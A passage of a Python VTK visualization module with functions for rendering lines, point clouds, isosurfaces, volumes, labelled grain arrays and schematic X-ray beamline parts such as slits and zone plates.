    :returns vtkActor: a vtkActor of the line that can be directly \
    added to a 3d scene.
'''
line_grid = build_line_mesh([start_point, end_point])
return line_actor(line_grid)
def circle_line_3d(center=(0, 0, 0), radius=1, normal=(0, 0, 1), resolution=1):
'''Function to draw a circle in a 3d scene.
:param tuple center: the center of the circle.
:param float radius: the radius of the circle.
    :param tuple normal: the normal to the plane of the circle (note: the parameter is currently not used, the circle is always drawn in a plane normal to (0, 0, 1)).
    :param float resolution: the resolution in degree.
    :returns vtkActor: a vtkActor that can be directly added to a 3d scene.
'''
n = int(360 / resolution)
line_points = []
line_points.append([center[0] + radius, center[1], center[2]]) # starting point
for i in range(n):
line_points.append([center[0] + radius * np.cos(resolution * (i + 1) * np.pi / 180), \
center[1] + radius * np.sin(resolution * (i + 1) * np.pi / 180), \
center[2]])
line_grid = build_line_mesh(line_points)
return line_actor(line_grid)
def point_cloud_3d(data_points, point_color=(0, 0, 0), point_size=1):
'''Function to display a point cloud in a 3d scene.
    :param list data_points: the list of points in the cloud.
    :param tuple point_color: the color to use to display the points.
    :param float point_size: the size of the points.
    :returns: a vtkActor of the point cloud that can be directly added to a 3d scene.
'''
data = vtk.vtkPolyData()
points = vtk.vtkPoints()
cells = vtk.vtkCellArray()
points.SetNumberOfPoints(len(data_points))
for i in range(len(data_points)):
(x, y, z) = data_points[i]
points.InsertPoint(i, x, y, z)
cells.InsertNextCell(1)
cells.InsertCellPoint(i)
data.SetPoints(points)
data.SetVerts(cells)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(data)
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(point_color)
actor.GetProperty().SetPointSize(point_size)
return actor
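# A minimal sketch for `point_cloud_3d`: display a random cloud of 1000
# points drawn uniformly in the unit cube (the `render` helper defined
# further down in this file provides the display boilerplate).
def _demo_point_cloud():
    cloud = np.random.rand(1000, 3).tolist()
    actor = point_cloud_3d(cloud, point_color=(1., 0., 0.), point_size=3)
    ren = vtk.vtkRenderer()
    ren.AddActor(actor)
    render(ren, display=True)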
def contourFilter(data, value, color=grey, diffuseColor=grey, opacity=1.0, discrete=False):
    '''This method creates an actor running a contour filter through the
    given data set.
    The data set can be given either in numpy or VTK format (it will be
    converted to VTK if needed). The method may require a fair amount of
    memory so downsample your data if you can.
    :param data: the dataset to map, in numpy or VTK format.
    :param float value: numeric value to use for contouring.
    :param color: the solid color to use for the contour actor.
    :param diffuseColor: the diffuse color to use for the contour actor.
    :param float opacity: the opacity value to use for the actor (1.0 by default).
    :param bool discrete: use vtkDiscreteMarchingCubes if True (False by default).
    :returns: a vtkActor that can be directly added to a renderer.
    '''
    if isinstance(data, np.ndarray):
data = numpy_array_to_vtk_grid(data, False)
if discrete:
contour = vtk.vtkDiscreteMarchingCubes()
else:
contour = vtk.vtkContourFilter()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
contour.SetInputData(data)
else:
contour.SetInput(data)
contour.SetValue(0, value)
contour.Update()
normals = vtk.vtkPolyDataNormals()
normals.SetInputConnection(contour.GetOutputPort())
normals.SetFeatureAngle(60.0)
mapper = vtk.vtkPolyDataMapper()
mapper.ScalarVisibilityOff()
mapper.SetInputConnection(normals.GetOutputPort())
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().SetColor(color)
actor.GetProperty().SetDiffuseColor(diffuseColor)
actor.GetProperty().SetSpecular(.4)
actor.GetProperty().SetSpecularPower(10)
actor.GetProperty().SetOpacity(opacity)
return actor
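# A minimal sketch for `contourFilter`: isosurface a synthetic numpy volume
# (a solid ball on a 64^3 grid) at the 0.5 level.
def _demo_contour_ball():
    x, y, z = np.ogrid[-1:1:64j, -1:1:64j, -1:1:64j]
    ball = (x ** 2 + y ** 2 + z ** 2 < 0.5).astype(np.uint8)
    actor = contourFilter(ball, 0.5, color=(1., 0., 0.),
                          diffuseColor=(1., 0., 0.), opacity=0.8)
    ren = vtk.vtkRenderer()
    ren.AddActor(actor)
    render(ren, display=True)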
def volren(data, alpha_channel=None, color_function=None):
'''Volume rendering for a 3d array using standard ray casting.
    :param data: the dataset to render, in numpy or VTK format.
    :param alpha_channel: a vtkPiecewiseFunction instance, default to linear between 0 and 255 if not given.
    :param color_function: an optional vtkColorTransferFunction to map the scalars to colors.
    :returns: a vtkVolume that can be added to a renderer.
'''
    if isinstance(data, np.ndarray):
data = numpy_array_to_vtk_grid(data, False)
    if alpha_channel is None:
alpha_channel = vtk.vtkPiecewiseFunction()
alpha_channel.AddPoint(0, 0.0)
alpha_channel.AddPoint(255, 0.5)
volumeProperty = vtk.vtkVolumeProperty()
    if color_function is not None:
volumeProperty.SetColor(color_function)
volumeProperty.SetScalarOpacity(alpha_channel)
compositeFunction = vtk.vtkVolumeRayCastCompositeFunction()
volumeMapper = vtk.vtkVolumeRayCastMapper()
volumeMapper.SetVolumeRayCastFunction(compositeFunction)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
volumeMapper.SetInputData(data)
else:
volumeMapper.SetInput(data)
volume = vtk.vtkVolume()
volume.SetMapper(volumeMapper)
volume.SetProperty(volumeProperty)
return volume
def elevationFilter(data, value, low_high_range, low_point=None, high_point=None):
'''Create an isosurface and map it with an elevation filter.
:param data: the dataset to map, in VTK format.
:param float value: the value to use to create the isosurface.
:param tuple low_high_range: range to use in the elevation filter in the form (low, high).
    :param tuple low_point: lower point defining the axis from which to compute the elevation.
        If not specified, (0, 0, low) is assumed.
    :param tuple high_point: upper point defining the axis from which to compute the elevation.
        If not specified, (0, 0, high) is assumed.
    :returns vtkActor: an actor that can be directly added to a renderer.
'''
low, high = low_high_range
lut = vtk.vtkLookupTable()
lut.SetHueRange(0.6, 0)
lut.SetSaturationRange(1.0, 0)
lut.SetValueRange(0.5, 1.0)
contour = vtk.vtkDiscreteMarchingCubes()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
contour.SetInputData(data)
else:
contour.SetInput(data)
contour.SetValue(0, value)
contour.Update()
elevation = vtk.vtkElevationFilter()
elevation.SetInputConnection(contour.GetOutputPort())
    if low_point is None:
        low_point = (0, 0, low)
    if high_point is None:
        high_point = (0, 0, high)
elevation.SetLowPoint(low_point)
elevation.SetHighPoint(high_point)
elevation.SetScalarRange(low, high)
elevation.ReleaseDataFlagOn()
normals = vtk.vtkPolyDataNormals()
normals.SetInputConnection(elevation.GetOutputPort())
normals.SetFeatureAngle(60.0)
mapper = vtk.vtkPolyDataMapper()
mapper.SetScalarRange(low, high)
mapper.SetLookupTable(lut)
mapper.ImmediateModeRenderingOn()
mapper.SetInputConnection(normals.GetOutputPort())
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
return actor
def numpy_array_to_vtk_grid(data, cell_data=True, array_name=None):
'''Transform a 3d numpy data array into a vtk uniform grid with scalar data.
:param data: the 3d numpy data array, possibly with 3 components using a 4th dimension.
:param bool cell_data: flag to assign cell data, as opposed to point data, to the grid (True by default).
:param str array_name: an optional name for the vtk array.
    :return vtkUniformGrid: a vtkUniformGrid with scalar data initialized from
        the provided numpy array.
'''
if data.ndim not in [3, 4]:
print('warning, data array dimension must be 3 or 4 (for multi-component)')
return None
if data.ndim == 3:
size = np.shape(data)
vtk_data_array = numpy_support.numpy_to_vtk(np.ravel(data, order='F'), deep=1)
elif data.ndim == 4:
print('treating the 4th dimension as 3 different components')
assert data.shape[3] == 3
size = np.shape(data)[:3]
# create the right type of array
vtk_type = numpy_support.get_vtk_array_type(data.dtype)
print('creating vtk array with type %d' % vtk_type)
vtk_data_array = vtk.vtkDataArray.CreateDataArray(vtk_type)
vtk_data_array.SetNumberOfComponents(data.shape[3])
n = np.prod(size)
vtk_data_array.SetNumberOfTuples(n)
for i in range(3):
vtk_data_array.CopyComponent(i, numpy_support.numpy_to_vtk(np.ravel(data[:, :, :, i], order='F'), deep=1), 0)
if array_name:
vtk_data_array.SetName(array_name)
grid = vtk.vtkUniformGrid()
if cell_data:
grid.SetExtent(0, size[0], 0, size[1], 0, size[2])
grid.GetCellData().SetScalars(vtk_data_array)
else:
grid.SetExtent(0, size[0] - 1, 0, size[1] - 1, 0, size[2] - 1)
grid.GetPointData().SetScalars(vtk_data_array)
grid.SetSpacing(1, 1, 1)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
grid.SetScalarType(vtk.VTK_UNSIGNED_CHAR, vtk.vtkInformation())
else:
grid.SetScalarType(vtk.VTK_UNSIGNED_CHAR)
return grid
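# A minimal sketch for `numpy_array_to_vtk_grid`: wrap a labeled uint8 numpy
# volume as cell data and check the resulting number of cells.
def _demo_numpy_to_grid():
    labels = np.zeros((10, 20, 30), dtype=np.uint8)
    labels[2:8, 5:15, 10:20] = 1  # a single cuboid grain
    grid = numpy_array_to_vtk_grid(labels, cell_data=True, array_name='labels')
    print('grid has %d cells' % grid.GetNumberOfCells())  # 10 * 20 * 30
    return grid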
def map_data_with_clip(data, lut=gray_cmap(), cell_data=True):
    '''This method constructs an actor to map a 3d dataset.
    1/8 of the data is clipped out to have a better view of the interior.
    It requires a fair amount of memory so downsample your data if you can
    (the downsampling may not even be visible on the resulting image).
.. code-block:: python
data = read_image_data(im_file, size)
ren = vtk.vtkRenderer()
actor = map_data_with_clip(data)
ren.AddActor(actor)
render(ren, display=True)
.. figure:: _static/pa66gf30_clip_3d.png
:width: 300 px
:alt: pa66gf30_clip_3d
:align: center
A 3D view of a polyamid sample with reinforcing glass fibers.
*Parameters*
**data**: the dataset to map, in numpy or VTK format.
**lut**: VTK look up table (default: `gray_cmap`).
**cell_data**: boolean to map cell data or point data if False (True by default)
*Returns*
    The method returns a vtkActor that can be directly added to a renderer.
'''
# implicit function
bbox = vtk.vtkBox()
    if isinstance(data, np.ndarray):
size = data.shape
bbox.SetXMin(size[0] / 2., -1, size[2] / 2.)
bbox.SetXMax(size[0] + 1, size[1] / 2., size[2] + 1)
else:
e = 0.001
bb = data.GetBounds()
bbox.SetXMin((bb[1] - bb[0]) / 2., bb[2] - e, (bb[5] - bb[4]) / 2.)
bbox.SetXMax(bb[1] + e, (bb[3] - bb[2]) / 2., bb[5] + e)
return map_data(data, bbox, lut=lut, cell_data=cell_data)
def map_data(data, function, lut=gray_cmap(), cell_data=True):
    '''This method constructs an actor to map a 3d dataset.
    It requires a fair amount of memory so downsample your data if you can
    (the downsampling may not even be visible on the resulting image).
*Parameters*
**data**: the dataset to map, in numpy or VTK format.
**function**: VTK implicit function where to map the data.
**lut**: VTK look up table (default: `gray_cmap`).
**cell_data**: boolean to map cell data or point data if False (True by default)
*Returns*
    The method returns a vtkActor that can be directly added to a renderer.
'''
    if isinstance(data, np.ndarray):
data = numpy_array_to_vtk_grid(data, cell_data)
# use extract geometry filter to access the data
extract = extract_poly_data(data, inside=False)
mapper = vtk.vtkDataSetMapper()
mapper.ScalarVisibilityOn()
mapper.SetLookupTable(lut)
mapper.UseLookupTableScalarRangeOn()
if cell_data:
mapper.SetScalarModeToUseCellData()
else:
mapper.SetScalarModeToUsePointData()
mapper.SetColorModeToMapScalars()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputConnection(extract.GetOutputPort())
# with VTK 6, since SetInputData does not create a pipeline, we can also use:
# extract.Update()
# mapper.SetInputData(extract.GetOutput())
else:
mapper.SetInput(extract.GetOutput())
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
return actor
def set_opacity(assembly, opacity):
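    '''Set the opacity of every actor contained in an assembly.
    :param assembly: the vtkAssembly to process.
    :param float opacity: the opacity value, between 0 (transparent) and 1 (opaque).
    '''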
collection = vtk.vtkPropCollection()
assembly.GetActors(collection)
for i in range(collection.GetNumberOfItems()):
collection.GetItemAsObject(i).GetProperty().SetOpacity(opacity)
def color_bar(title, lut=None, fmt='%.1e', width=0.5, height=0.075, num_labels=7, font_size=26):
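    '''Create a horizontal scalar bar actor to overlay on a rendered scene.
    :param str title: the title displayed above the bar.
    :param lut: the vtk lookup table to display (a jet colormap is used if not given).
    :param str fmt: the format string for the labels ('%.1e' by default).
    :param float width: the bar width in normalized viewport coordinates (0.5 by default).
    :param float height: the bar height in normalized viewport coordinates (0.075 by default).
    :param int num_labels: the number of labels to display (7 by default).
    :param int font_size: the font size of the title and labels (26 by default).
    :return: a vtkScalarBarActor positioned at the bottom center of the viewport.
    '''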
bar = vtk.vtkScalarBarActor()
if not lut:
lut = jet_cmap()
bar.SetLookupTable(lut)
bar.SetTitle(title)
bar.GetPositionCoordinate().SetCoordinateSystemToNormalizedViewport()
bar.GetPositionCoordinate().SetValue(0.5 * (1 - width), 0.025)
bar.SetOrientationToHorizontal()
bar.SetLabelFormat(fmt)
bar.GetLabelTextProperty().SetColor(0, 0, 0)
bar.GetTitleTextProperty().SetColor(0, 0, 0)
bar.GetLabelTextProperty().SetFontSize(font_size)
bar.GetTitleTextProperty().SetFontSize(font_size)
bar.SetWidth(width)
bar.SetHeight(height)
bar.SetNumberOfLabels(num_labels)
return bar
def text(text, font_size=20, color=(0, 0, 0), hor_align='center', coords=(0.5, 0.5)):
    '''Create a 2D text actor to add to a 3d scene.
    :param str text: the text to display.
    :param int font_size: the font size (20 by default).
    :param tuple color: the face color (black by default).
    :param str hor_align: horizontal alignment, should be 'left', 'center' or 'right' (center by default).
    :param tuple coords: a sequence of two values between 0 and 1.
    :returns: an actor for the text to add to a renderer.
'''
textMapper = vtk.vtkTextMapper()
textMapper.SetInput(text)
tprop = textMapper.GetTextProperty()
tprop.SetFontSize(font_size)
tprop.SetFontFamilyToArial()
tprop.BoldOff()
if hor_align == 'left':
tprop.SetJustificationToLeft()
elif hor_align == 'center':
tprop.SetJustificationToCentered()
elif hor_align == 'right':
tprop.SetJustificationToRight()
tprop.SetColor(color)
textActor = vtk.vtkActor2D()
textActor.SetMapper(textMapper)
textActor.GetPositionCoordinate().SetCoordinateSystemToNormalizedDisplay()
textActor.GetPositionCoordinate().SetValue(coords[0], coords[1])
return textActor
def setup_camera(size=(100, 100, 100)):
'''Setup the camera with usual viewing parameters.
The camera is looking at the center of the data with the Z-axis vertical.
*Parameters*
**size**: the size of the 3d data set (100x100x100 by default).
'''
cam = vtk.vtkCamera()
cam.SetViewUp(0, 0, 1)
cam.SetPosition(2 * size[0], -2 * size[1], 2 * size[2])
cam.SetFocalPoint(0.5 * size[0], 0.5 * size[1], 0.5 * size[2])
cam.SetClippingRange(1, 10 * max(size))
return cam
def render(ren, ren_size=(600, 600), display=True, save=False, name='render_3d.png', key_pressed_callback=None):
'''Render the VTK scene in 3D.
Given a `vtkRenderer`, this function does the actual 3D rendering. It
    can be used to display the scene interactively and/or save a still
    image in png format.
    *Parameters*
    **ren**: the VTK renderer containing all the actors.
    **ren_size**: a tuple with two values to set the size of the image in
    pixels (default 600x600).
    **display**: a boolean to control if the scene has to be displayed
    interactively to the user (default True).
    **save**: a boolean to control if the scene has to be saved as a
    png image (default False).
    **name**: a string used when saving the scene as an image (default
    is 'render_3d.png').
    **key_pressed_callback**: a function called in interactive mode when
    a key is pressed.
'''
# Create a window for the renderer
if save:
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(ren_size)
# capture the display and write a png image
w2i = vtk.vtkWindowToImageFilter()
writer = vtk.vtkPNGWriter()
w2i.SetInput(renWin)
w2i.Update()
writer.SetInputConnection(w2i.GetOutputPort())
writer.SetFileName(name)
renWin.Render()
writer.Write()
if display:
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetSize(ren_size)
# Start the initialization and rendering
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
if key_pressed_callback:
iren.AddObserver("KeyPressEvent", key_pressed_callback)
renWin.Render()
iren.Initialize()
iren.Start()
def extract_poly_data(grid, inside=True, boundary=True):
'''Convert from vtkUnstructuredGrid to vtkPolyData.
:param grid: the vtkUnstructuredGrid instance.
:param bool inside: flag to extract inside cells or not.
:param bool boundary: flag to include boundary cells.
:returns: the vtkExtractGeometry filter.
'''
# use extract geometry filter to access the data
extract = vtk.vtkExtractGeometry()
# extract = vtk.vtkExtractVOI() # much faster but seems not to work with blanking
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
extract.SetInputData(grid)
else:
extract.SetInput(grid)
if boundary:
extract.ExtractBoundaryCellsOn()
else:
extract.ExtractBoundaryCellsOff()
if inside:
extract.ExtractInsideOn()
else:
extract.ExtractInsideOff()
bbox = vtk.vtkBox()
bounds = grid.GetBounds()
bbox.SetXMin(bounds[0::2])
bbox.SetXMax(bounds[1::2])
extract.SetImplicitFunction(bbox)
extract.Update()
return extract
def select(grid, id_list, verbose=False):
'''Select cells in vtkUnstructuredGrid based on a list of indices.
:param vtkUnstructuredGrid grid: the grid on which to perform the selection.
:param list id_list: the indices of the cells to select.
:param bool verbose: a flag to activate verbose mode.
:returns: a new vtkUnstructuredGrid containing the selected cells.
'''
ids = vtk.vtkIdTypeArray()
ids.SetNumberOfComponents(1)
for v in id_list:
ids.InsertNextValue(v)
selection_node = vtk.vtkSelectionNode()
selection_node.SetContentType(vtk.vtkSelectionNode.INDICES)
selection_node.SetSelectionList(ids)
selection = vtk.vtkSelection()
selection.AddNode(selection_node)
extract_selection = vtk.vtkExtractSelection()
extract_selection.SetInputData(0, grid)
extract_selection.SetInputData(1, selection)
extract_selection.Update()
# finally create a new vtkUnstructuredGrid instance to return
selected = vtk.vtkUnstructuredGrid()
selected.ShallowCopy(extract_selection.GetOutput())
if verbose:
print('performing selection with id %s' % id_list)
print('number of points in selection: %d' % selected.GetNumberOfPoints())
print('number of cells in selection: %d' % selected.GetNumberOfCells())
return selected
def show_array(data, map_scalars=False, lut=None, hide_zero_values=True):
"""Create a 3d actor representing a numpy array.
Given a 3d array, this function compute the skin of the volume.
The scalars can be mapped to the created surface and the colormap
adjusted. If the data is in numpy format it is converted to VTK first.
:param data: the dataset, in numpy or VTK format.
:param bool map_scalars: map the scalar in the data array to the created
surface (False by default).
:param lut: a vtk lookup table (colormap) used to map the scalars.
:param bool hide_zero_values: blank cells with a value of zero (True
by default)
    :return: a vtk actor that can be added to a renderer to show the 3d array.
"""
    if isinstance(data, np.ndarray):
grid = numpy_array_to_vtk_grid(data, cell_data=True)
if hide_zero_values:
# workaround as SetCellVisibilityArray is not available anymore after vtk 6.3
            if vtk.vtkVersion().GetVTKMajorVersion() > 6 or \
                    (vtk.vtkVersion().GetVTKMajorVersion() == 6 and
                     vtk.vtkVersion().GetVTKMinorVersion() > 2):
                ids_to_blank = np.squeeze(np.argwhere(
                    data.transpose(2, 1, 0).flatten() == 0))
                for cell_id in ids_to_blank:
                    grid.BlankCell(cell_id)
else:
visible = numpy_support.numpy_to_vtk(np.ravel(
data > 0, order='F').astype(np.uint8), deep=1)
grid.SetCellVisibilityArray(visible)
else:
grid = data
extract = extract_poly_data(grid)
return show_mesh(extract.GetOutput(), map_scalars, lut)
def show_mesh(grid, map_scalars=False, lut=None, show_edges=False, edge_color=(0., 0., 0.), edge_line_width=1.0):
"""Create a 3d actor representing a mesh.
:param grid: the vtkUnstructuredGrid object.
:param bool map_scalars: map the scalar in the data array to the created surface (False by default).
:param lut: a vtk lookup table (colormap) used to map the scalars.
:param bool show_edges: display the mesh edges (False by default).
:param tuple edge_color: color to use for the mesh edges (black by default).
:param float edge_line_width: width of the edge lines (1.0 by default).
    :return: a vtk actor that can be added to a renderer to show the 3d array.
"""
mapper = vtk.vtkDataSetMapper()
mapper.ScalarVisibilityOff()
if map_scalars:
mapper.ScalarVisibilityOn()
mapper.UseLookupTableScalarRangeOn()
mapper.SetScalarModeToUseCellData()
mapper.SetColorModeToMapScalars()
if not lut:
# default to the usual gray colormap
lut = gray_cmap()
mapper.SetLookupTable(lut)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputData(grid)
else:
mapper.SetInput(grid)
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
if show_edges:
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetEdgeColor(edge_color)
actor.GetProperty().SetLineWidth(edge_line_width)
actor.GetProperty().SetSpecular(.4)
actor.GetProperty().SetSpecularPower(10)
actor.GetProperty().SetOpacity(1.0)
return actor
def show_grains(data, num_colors=2048):
'''Create a 3d actor of all the grains in a labeled numpy array.
    Given a 3d numpy array, this function computes the skin of all the
    grains (labels > 0). The background is assumed to be zero and is
    removed. The actor produced is colored by the grain ids using the
    random color map, see `rand_cmap`.
*Parameters*
**data**: a labeled numpy array.
**num_colors**: number of colors in the lookup table (2048 by default)
    Returns a vtk actor that can be added to a renderer to show all the
    grains colored by their id.
'''
grain_lut = rand_cmap(N=num_colors, first_is_black=True, table_range=(0, num_colors - 1))
grains = show_array(data, map_scalars=True, lut=grain_lut)
return grains
def show_boundaries(grid, array_id=0, array_name=None, write=False):
    '''Create an actor representing the boundaries separating different
    values of a given array. The array values must be of an integer type.
:param vtkUnstructuredGrid grid: the unstructured grid referencing the data array.
:param int array_id: the index of the array to process (default 0).
:param str array_name: the name of the array to process.
:param bool write: flag to write the boundary polydata to the disk.
:return: a VTK actor containing the boundaries.
'''
# if array_name is specified, find the corresponding array
if array_name:
array_id = -1
for i in range(grid.GetCellData().GetNumberOfArrays()):
if grid.GetCellData().GetArray(i).GetName() == array_name:
array_id = i
break
if array_id < 0:
print('warning, array %s not found in CellData arrays' % array_name)
return
    array = grid.GetCellData().GetArray(array_id)
    if array_name is None:
        # the rest of the function needs the array name
        array_name = array.GetName()
    assert array.GetName() == array_name
assert array.GetDataType() in [vtk.VTK_UNSIGNED_SHORT, vtk.VTK_UNSIGNED_CHAR, vtk.VTK_INT]
grid.GetCellData().SetActiveScalars(array_name)
# we use a vtkAppendPolyData to gather all the boundaries
append = vtk.vtkAppendPolyData()
numpy_array = numpy_support.vtk_to_numpy(array)
gids_list = np.unique(numpy_array)
    print('field range used to find the boundaries: [%d - %d]' % (gids_list[0], gids_list[-1]))
for gid in gids_list:
print('trying gid=%d' % gid)
thresh = vtk.vtkThreshold()
thresh.SetInputData(grid)
thresh.ThresholdBetween(gid - 0.5, gid + 0.5)
thresh.SetInputArrayToProcess(1, 0, 0, 0, array_name)
thresh.Update()
geometryFilter = vtk.vtkGeometryFilter()
geometryFilter.SetInputConnection(thresh.GetOutputPort())
boundariesExtractor = vtk.vtkFeatureEdges()
boundariesExtractor.SetInputConnection(geometryFilter.GetOutputPort())
boundariesExtractor.BoundaryEdgesOn()
append.AddInputConnection(boundariesExtractor.GetOutputPort())
# remove any duplicate points
clean = vtk.vtkCleanPolyData()
clean.SetInputConnection(append.GetOutputPort())
clean.Update()
if write:
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName('gb.vtp')
writer.SetInputConnection(clean.GetOutputPort())
writer.Write()
        print('writing gb.vtp')
boundariesActor = edges_actor(clean.GetOutput(), linewidth=4.0, linecolor=black)
return boundariesActor
def edges_actor(polydata, linewidth=1.0, linecolor=black):
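    '''Create an actor to display the edges of a polydata.
    :param polydata: the vtkPolyData instance to display.
    :param float linewidth: the width of the lines (1.0 by default).
    :param linecolor: the color of the lines (black by default).
    :return: a vtkActor with edge visibility turned on.
    '''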
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputData(polydata)
mapper.ScalarVisibilityOff()
mapper.Update()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
actor.GetProperty().EdgeVisibilityOn()
actor.GetProperty().SetColor(linecolor)
actor.GetProperty().SetLineWidth(linewidth)
return actor
def xray_arrow():
xrays_arrow = vtk.vtkArrowSource()
xrays_mapper = vtk.vtkPolyDataMapper()
xrays_mapper.SetInputConnection(xrays_arrow.GetOutputPort())
xrays = vtk.vtkActor()
xrays.SetMapper(xrays_mapper)
return xrays
def slits(size, x_slits=0):
'''Create a 3d schematic representation of X-ray slits.
The 3d representation is made of 4 corners of the given size along
the Y and Z axes.
**Parameters**:
*size*: a (X,Y,Z) tuple giving the size of the illuminated volume.
The first value of the tuple is not used.
*x_slits*: position of the slits along the X axis (0 by default).
**Returns**:
A vtk assembly of the 4 corners representing the slits.
'''
slits = vtk.vtkAssembly()
corner_points = np.empty((3, 3, 4), dtype=float)
corner_points[:, 0, 0] = [x_slits, -0.6 * size[1] / 2, -size[2] / 2]
corner_points[:, 1, 0] = [x_slits, -size[1] / 2, -size[2] / 2]
corner_points[:, 2, 0] = [x_slits, -size[1] / 2, -0.6 * size[2] / 2]
corner_points[:, 0, 1] = [x_slits, -0.6 * size[1] / 2, size[2] / 2]
corner_points[:, 1, 1] = [x_slits, -size[1] / 2, size[2] / 2]
corner_points[:, 2, 1] = [x_slits, -size[1] / 2, 0.6 * size[2] / 2]
corner_points[:, 0, 2] = [x_slits, 0.6 * size[1] / 2, -size[2] / 2]
corner_points[:, 1, 2] = [x_slits, size[1] / 2, -size[2] / 2]
corner_points[:, 2, 2] = [x_slits, size[1] / 2, -0.6 * size[2] / 2]
corner_points[:, 0, 3] = [x_slits, 0.6 * size[1] / 2, size[2] / 2]
corner_points[:, 1, 3] = [x_slits, size[1] / 2, size[2] / 2]
corner_points[:, 2, 3] = [x_slits, size[1] / 2, 0.6 * size[2] / 2]
for c in range(4):
linePoints = vtk.vtkPoints()
linePoints.SetNumberOfPoints(3)
linePoints.InsertPoint(0, corner_points[:, 0, c])
linePoints.InsertPoint(1, corner_points[:, 1, c])
linePoints.InsertPoint(2, corner_points[:, 2, c])
line1 = vtk.vtkLine()
line1.GetPointIds().SetId(0, 0)
line1.GetPointIds().SetId(1, 1)
line2 = vtk.vtkLine()
line2.GetPointIds().SetId(0, 1)
line2.GetPointIds().SetId(1, 2)
slitCorner1Grid = vtk.vtkUnstructuredGrid()
slitCorner1Grid.Allocate(2, 1)
slitCorner1Grid.InsertNextCell(line1.GetCellType(), line1.GetPointIds())
slitCorner1Grid.InsertNextCell(line2.GetCellType(), line2.GetPointIds())
slitCorner1Grid.SetPoints(linePoints)
slitCorner1Mapper = vtk.vtkDataSetMapper()
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
slitCorner1Mapper.SetInputData(slitCorner1Grid)
else:
slitCorner1Mapper.SetInput(slitCorner1Grid)
slitCorner1Actor = vtk.vtkActor()
slitCorner1Actor.SetMapper(slitCorner1Mapper)
slitCorner1Actor.GetProperty().SetLineWidth(3.0)
slitCorner1Actor.GetProperty().SetDiffuseColor(black)
slits.AddPart(slitCorner1Actor)
return slits
def pin_hole(inner_radius=100, outer_radius=200):
pin_hole = vtk.vtkAssembly()
disc = vtk.vtkDiskSource()
disc.SetCircumferentialResolution(50)
disc.SetInnerRadius(inner_radius)
disc.SetOuterRadius(outer_radius)
disc_mapper = vtk.vtkPolyDataMapper()
disc_mapper.SetInputConnection(disc.GetOutputPort())
discActor = vtk.vtkActor()
discActor.SetMapper(disc_mapper)
discActor.GetProperty().SetColor(black)
pin_hole.AddPart(discActor)
pin_hole.RotateY(90)
return pin_hole
def zone_plate(thk=50, sep=25, n_rings=5):
'''Create a 3d schematic representation of a Fresnel zone plate.
The 3d representation is made of a number of concentric rings separated
by a specific distance which controls the X-ray focalisation.
**Parameters**:
*thk*: ring thickness (50 by default).
*sep*: ring spacing (25 by default).
*n_rings*: number of rings (5 by default).
**Returns**:
A vtk assembly of the rings composing the Fresnel zone plate.
'''
zone_plate = vtk.vtkAssembly()
for i in range(n_rings):
disc = vtk.vtkDiskSource()
disc.SetCircumferentialResolution(50)
disc.SetInnerRadius(i * (thk + sep))
disc.SetOuterRadius((i + 1) * thk + i * sep)
disc_mapper = vtk.vtkPolyDataMapper()
disc_mapper.SetInputConnection(disc.GetOutputPort())
discActor = vtk.vtkActor()
discActor.SetMapper(disc_mapper)
zone_plate.AddPart(discActor)
zone_plate.RotateY(90)
return zone_plate
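# Minimal sketch assembling the beamline schematic pieces defined above into
# one renderer (all positions and sizes below are hypothetical):
#
#   ren = vtk.vtkRenderer()
#   ren.AddActor(xray_arrow())
#   ren.AddActor(slits((0, 500, 500), x_slits=-1000))
#   ren.AddActor(pin_hole(inner_radius=50, outer_radius=150))
#   ren.AddActor(zone_plate(thk=50, sep=25, n_rings=5))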
def grid_vol_view(scan):
s_size = scan[:-4].split('_')[-2].split('x')
s_type = scan[:-4].split('_')[-1]
size = [int(s_size[0]), int(s_size[1]), int(s_size[2])]
# prepare a uniform grid to receive the image data
grid = vtk.vtkUniformGrid()
grid.SetExtent(0, size[0], 0, size[1], 0, size[2])
grid.SetOrigin(0, 0, 0)
grid.SetSpacing(1, 1, 1)
grid.SetScalarType(to_vtk_type(s_type))
# read the actual image data
print('reading scan %s with size %dx%dx%d using type %d' % (scan, size[0], size[1], size[2], to_vtk_type(s_type)))
reader = vtk.vtkImageReader2() # 2 is faster
reader.SetDataScalarType(to_vtk_type(s_type))
reader.SetFileDimensionality(3)
reader.SetHeaderSize(0)
reader.SetDataByteOrderToLittleEndian()
reader.FileLowerLeftOn()
reader.SetDataExtent(0, size[0] - 1, 0, size[1] - 1, 0, size[2] - 1)
reader.SetNumberOfScalarComponents(1)
reader.SetDataOrigin(0, 0, 0)
reader.SetFileName(scan)
reader.Update()
data = reader.GetOutput()
# expose the image data array
array = data.GetPointData().GetScalars()
grid.GetCellData().SetScalars(array)
grid.SetCellVisibilityArray(array)
# create random lut
lut = rand_cmap(N=2048, first_is_black=True, table_range=(0, 2047))
extract = extract_poly_data(grid)
# create mapper
print('creating actors')
mapper = vtk.vtkDataSetMapper()
mapper.SetLookupTable(lut)
if vtk.vtkVersion().GetVTKMajorVersion() > 5:
mapper.SetInputData(extract.GetOutput())
else:
mapper.SetInput(extract.GetOutput())
mapper.UseLookupTableScalarRangeOn()
mapper.SetScalarModeToUseCellData()
mapper.SetColorModeToMapScalars()
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# set up camera
